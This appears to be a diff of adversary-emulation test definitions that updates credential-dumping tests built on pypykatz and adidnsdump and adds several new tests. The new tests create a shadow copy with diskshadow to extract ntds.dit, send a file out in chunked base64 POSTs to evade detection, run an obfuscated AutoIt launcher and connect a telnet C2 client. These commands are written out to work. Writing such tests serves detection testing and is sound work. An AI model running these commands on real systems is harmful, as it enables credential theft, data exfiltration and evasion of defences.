-py -3 --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
+```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Computer must have pip installed
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
-```cmd
-py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+```powershell
+py -m venv "#{venv_path}"
 ```
-##### Description: pypykatz must be installed and part of PATH
+##### Description: pypykatz must be installed
 ##### Check Prereq Commands:
-```cmd
-pypykatz -h >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-pip install pypykatz
+```powershell
+& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
 ```


@@ -186,40 +186,43 @@ atomic_tests:
    Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

    Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
+
+    Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
+
  supported_platforms:
  - windows
-  dependency_executor_name: command_prompt
+  input_arguments:
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
+  dependency_executor_name: powershell
  dependencies:
  - description: |
      Computer must have python 3 installed
    prereq_command: |
-      py -3 --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
      invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
      Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
  - description: |
-      Computer must have pip installed
+      Computer must have venv configured at #{venv_path}
    prereq_command: |
-      py -3 -m pip --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
    get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+      py -m venv "#{venv_path}"
  - description: |
-      pypykatz must be installed and part of PATH
+      pypykatz must be installed 
    prereq_command: |
-      pypykatz -h >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
    get_prereq_command: |
-      pip install pypykatz
+      & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
  executor:
    command: |
-      pypykatz live lsa
+      "#{venv_path}\Scripts\pypykatz" live lsa 
+    cleanup_command: |
+      del "%temp%\nanodump.dmp" > nul 2> nul
    name: command_prompt
    elevation_required: true
 - name: Dump LSASS.exe Memory using Out-Minidump.ps1
@@ -82,7 +82,9 @@ del %temp%\security >nul 2> nul
 <br/>

 ## Atomic Test #2 - Registry parse with pypykatz
-Parses registry hives to obtain stored credentials
+Parses registry hives to obtain stored credentials.
+
+Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.

 **Supported Platforms:** Windows

@@ -93,47 +95,51 @@ Parses registry hives to obtain stored credentials



+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_002|
+

 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


 ```cmd
-pypykatz live registry
+"#{venv_path}\Scripts\pypykatz" live lsa
 ```




-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
-```cmd
-py -3 --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-echo "Python 3 must be installed manually"
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Computer must have pip installed
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
-```cmd
-py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-echo "PIP must be installed manually"
+```powershell
+py -m venv "#{venv_path}"
 ```
-##### Description: pypykatz must be installed and part of PATH
+##### Description: pypykatz must be installed
 ##### Check Prereq Commands:
-```cmd
-pypykatz -h >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-pip install pypykatz
+```powershell
+& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
 ```


@@ -25,35 +25,41 @@ atomic_tests:
 - name: Registry parse with pypykatz
  auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
  description: |
-    Parses registry hives to obtain stored credentials
+    Parses registry hives to obtain stored credentials.
+
+    Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
  supported_platforms:
  - windows
-  dependency_executor_name: command_prompt
+  input_arguments:
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002
+  dependency_executor_name: powershell
  dependencies:
  - description: |
      Computer must have python 3 installed
    prereq_command: |
-      py -3 --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
    get_prereq_command: |
-      echo "Python 3 must be installed manually"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+      invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+      Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
  - description: |
-      Computer must have pip installed
+      Computer must have venv configured at #{venv_path}
    prereq_command: |
-      py -3 -m pip --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
    get_prereq_command: |
-      echo "PIP must be installed manually"
+      py -m venv "#{venv_path}"
  - description: |
-      pypykatz must be installed and part of PATH
+      pypykatz must be installed 
    prereq_command: |
-      pypykatz -h >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
    get_prereq_command: |
-      pip install pypykatz
+      & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
  executor:
    command: |
-      pypykatz live registry
+      "#{venv_path}\Scripts\pypykatz" live lsa 
    name: command_prompt
    elevation_required: true
 - name: esentutl.exe SAM copy
@@ -30,6 +30,8 @@ The following tools and techniques can be used to enumerate the NTDS file and th

 - [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)

+- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
+

 <br/>

@@ -425,4 +427,39 @@ mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1



+<br/>
+<br/>
+
+## Atomic Test #9 - Create Volume Shadow Copy with diskshadow
+This test is intended to be run on a domain controller
+An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b385996c-0e7d-4e27-95a4-aca046b119a7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| filename | Location of the script | Path | PathToAtomicsFolder&#92;T1003.003&#92;src&#92;diskshadow.txt|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+mkdir c:\exfil
+diskshadow.exe /s #{filename}
+```
+
+
+
+
+
+
 <br/>
@@ -242,3 +242,22 @@ atomic_tests:
      mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
    name: command_prompt
    elevation_required: true
+
+- name: Create Volume Shadow Copy with diskshadow
+  auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7
+  description: |
+    This test is intended to be run on a domain controller
+    An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+  supported_platforms:
+  - windows
+  input_arguments: 
+    filename:
+      description: Location of the script
+      type: Path
+      default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt
+  executor:
+    command: |
+      mkdir c:\exfil
+      diskshadow.exe /s #{filename}
+    name: command_prompt
+    elevation_required: true
@@ -0,0 +1,5 @@
+set context persistent nowriters
+set metadata C:\exfil\metadata.cab
+add volume c: alias loot
+create
+expose %loot% s:
@@ -351,13 +351,14 @@ Successful execution of this test will list dns zones in the terminal.
 | user_name | username including domain. | string | domain&#92;user|
 | acct_pass | Account password. | string | password|
 | host_name | hostname or ip address to connect to. | string | 192.168.1.1|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1018|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


 ```cmd
-adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 ```


@@ -367,7 +368,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1}
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -375,27 +376,23 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Computer must have pip installed
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
 ```powershell
-if (pip3 -V) {exit 0} else {exit 1}
+if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+py -m venv "#{venv_path}"
 ```
-##### Description: adidnsdump must be installed and part of PATH
+##### Description: adidnsdump must be installed
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
-pip3 install adidnsdump
+& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
 ```


@@ -166,35 +166,35 @@ atomic_tests:
      description: hostname or ip address to connect to.
      type: string
      default: "192.168.1.1"
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Computer must have python 3 installed
    prereq_command: |
-      if (python --version) {exit 0} else {exit 1}
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
      invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
      Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
  - description: |
-      Computer must have pip installed
+      Computer must have venv configured at #{venv_path}
    prereq_command: |
-      if (pip3 -V) {exit 0} else {exit 1}
+      if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
    get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+      py -m venv "#{venv_path}"
  - description: |
-      adidnsdump must be installed and part of PATH
+      adidnsdump must be installed
    prereq_command: |
-      if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+      if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
    get_prereq_command: |
-      pip3 install adidnsdump
+      & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
  executor:
    command: |
-      adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+      "#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
    name: command_prompt
    elevation_required: true
 - name: Adfind - Enumerate Active Directory Computer Objects
@@ -6,6 +6,8 @@

 - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits)

+- [Atomic Test #2 - Network-Based Data Transfer in Small Chunks](#atomic-test-2---network-based-data-transfer-in-small-chunks)
+

 <br/>

@@ -57,4 +59,47 @@ if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/s



+<br/>
+<br/>
+
+## Atomic Test #2 - Network-Based Data Transfer in Small Chunks
+Simulate transferring data over a network in small chunks to evade detection.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f0287b58-f4bc-40f6-87eb-692e126e7f8f
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| source_file_path | Path to the source file to transfer. | path | [User specified]|
+| destination_url | URL of the destination server. | url | http://example.com|
+| chunk_size | Size of each data chunk (in KB). | integer | 1024|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$file = [System.IO.File]::OpenRead(#{source_file_path})
+$chunkSize = #{chunk_size} * 1KB
+$buffer = New-Object Byte[] $chunkSize
+
+while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+    $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+    Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+}
+$file.Close()
+```
+
+
+
+
+
+
 <br/>
@@ -31,3 +31,35 @@ atomic_tests:
    cleanup_command: |
      if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
    name: sh
+
+- name: Network-Based Data Transfer in Small Chunks
+  auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
+  description: "Simulate transferring data over a network in small chunks to evade detection."
+  supported_platforms:
+  - "windows"
+  input_arguments:
+    source_file_path:
+      description: "Path to the source file to transfer."
+      type: path
+      default: "[User specified]"
+    destination_url:
+      description: "URL of the destination server."
+      type: url
+      default: "http://example.com"
+    chunk_size:
+      description: "Size of each data chunk (in KB)."
+      type: integer
+      default: 1024
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $file = [System.IO.File]::OpenRead(#{source_file_path})
+      $chunkSize = #{chunk_size} * 1KB
+      $buffer = New-Object Byte[] $chunkSize
+  
+      while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+          $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+          Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+      }
+      $file.Close()
@@ -215,7 +215,7 @@ python "#{filename}" -i #{host_ip}
 ##### Description: Check if python exists on the machine
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1}
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -115,7 +115,7 @@ atomic_tests:
  - description: |
      Check if python exists on the machine
    prereq_command: |
-      if (python --version) {exit 0} else {exit 1}
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
      invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
@@ -48,7 +48,8 @@ $which_python -c 'import requests;import os;url = "#{script_url}";malicious_comm

 #### Cleanup Commands:
 ```sh
-rm #{payload_file_name}
+rm #{payload_file_name} 
+pip-autoremove pypykatz >nul 2> nul
 ```


@@ -38,6 +38,7 @@ atomic_tests:
      name: sh
      cleanup_command: |
        rm #{payload_file_name} 
+        pip-autoremove pypykatz >nul 2> nul
  - name: 'Execute Python via scripts'
    auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
    description: Create Python file (.py) that downloads and executes shell script via executor arguments
@@ -0,0 +1,67 @@
+# T1059 - Command and Scripting Interpreter
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059)
+<blockquote>Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
+
+Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - AutoIt Script Execution](#atomic-test-1---autoit-script-execution)
+
+
+<br/>
+
+## Atomic Test #1 - AutoIt Script Execution
+An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a9b93f17-31cb-435d-a462-5e838a2a6026
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| script_path | AutoIt Script Path | path | PathToAtomicsFolder&#92;T1059&#92;src&#92;calc.au3|
+| autoit_path | AutoIt Executable File Path | path | C:&#92;Program Files (x86)&#92;AutoIt3&#92;AutoIt3.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AutoIt executable file must exist on disk at the specified location (#{autoit_path})
+##### Check Prereq Commands:
+```powershell
+if(Test-Path "#{autoit_path}") {
+    exit 0
+} else {
+    exit 1
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+$AutoItURL = "https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe"
+$InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads\autoit-v3-setup.exe"
+Invoke-WebRequest -Uri $AutoItURL -OutFile $InstallerPath
+Start-Process -FilePath $InstallerPath -ArgumentList "/S" -Wait
+```
+
+
+
+
+<br/>
@@ -0,0 +1,38 @@
+attack_technique: T1059
+display_name: 'Command and Scripting Interpreter'
+atomic_tests:
+- name: AutoIt Script Execution
+  auto_generated_guid: a9b93f17-31cb-435d-a462-5e838a2a6026
+  description: |
+    An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AutoIt executable file must exist on disk at the specified location (#{autoit_path})
+    prereq_command: |
+      if(Test-Path "#{autoit_path}") {
+          exit 0
+      } else {
+          exit 1
+      }
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      $AutoItURL = "https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe"
+      $InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads\autoit-v3-setup.exe"
+      Invoke-WebRequest -Uri $AutoItURL -OutFile $InstallerPath
+      Start-Process -FilePath $InstallerPath -ArgumentList "/S" -Wait
+  input_arguments:
+    script_path:
+      description: AutoIt Script Path
+      type: path
+      default: PathToAtomicsFolder\T1059\src\calc.au3
+    autoit_path:
+      description: AutoIt Executable File Path
+      type: path
+      default: C:\Program Files (x86)\AutoIt3\AutoIt3.exe
+  executor:
+    command: |
+      Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
+    name: powershell
@@ -0,0 +1,34 @@
+; This script demonstrates obfuscation techniques and suspicious behaviors
+
+; Hide the AutoIt window
+#NoTrayIcon
+
+; Delay execution to avoid detection
+Sleep(2000)
+
+; Randomize variable names and function calls to evade static analysis
+Local $s = "calc"
+Local $x = "o"
+Local $y = "i"
+Local $z = "e"
+Local $t = "r"
+Local $a = "c"
+Local $b = "t"
+Local $c = "x"
+Local $d = "e"
+Local $e = "u"
+Local $f = "a"
+Local $g = "s"
+
+; Create variables to store command strings
+Local $command1 = $s & $x & $y & $z & $t & $a & $b & $c & $d & $e & $f & $g
+Local $command2 = $s & $t & $y & $a & $c & $t
+
+; Mimic the launch of a potentially malicious process
+Run("powershell -Command ""Start-Process -FilePath 'calc.exe' -WindowStyle Hidden""", "", @SW_HIDE)
+
+; Generate random delays between commands to avoid pattern detection
+Sleep(Random(1000, 3000))
+
+; Exit the script to avoid further detection
+Exit
@@ -98,9 +98,9 @@ if (Test-Path #{curl_path}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+Invoke-WebRequest "https://curl.se/windows/dl-8.6.0_2/curl-8.6.0_2-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
 Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
-Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe" #{curl_path}
+Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.6.0_2-win32-mingw\bin\curl.exe" #{curl_path}
 Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
 Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
 ```
@@ -48,9 +48,9 @@ atomic_tests:
      if (Test-Path #{curl_path}) {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-      Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+      Invoke-WebRequest "https://curl.se/windows/dl-8.6.0_2/curl-8.6.0_2-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
      Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
-      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe" #{curl_path}
+      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.6.0_2-win32-mingw\bin\curl.exe" #{curl_path}
      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
  executor:
@@ -0,0 +1,59 @@
+# T1071 - Application Layer Protocol
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1071)
+<blockquote>Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
+
+Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Telnet C2](#atomic-test-1---telnet-c2)
+
+
+<br/>
+
+## Atomic Test #1 - Telnet C2
+An adversary may establish telnet communication from compromised endpoint to command and control (C2) server to be able to operate more attack on objectives.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3b0df731-030c-4768-b492-2a3216d90e53
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| server_ip | C2 server IP or URL | url | 127.0.0.1|
+| client_path | Client agent path | url | PathToAtomicsFolder&#92;T1071&#92;bin&#92;telnet_client.exe|
+| server_port | C2 server port | Integer | 23|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+#{client_path} #{server_ip} --port #{server_port}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
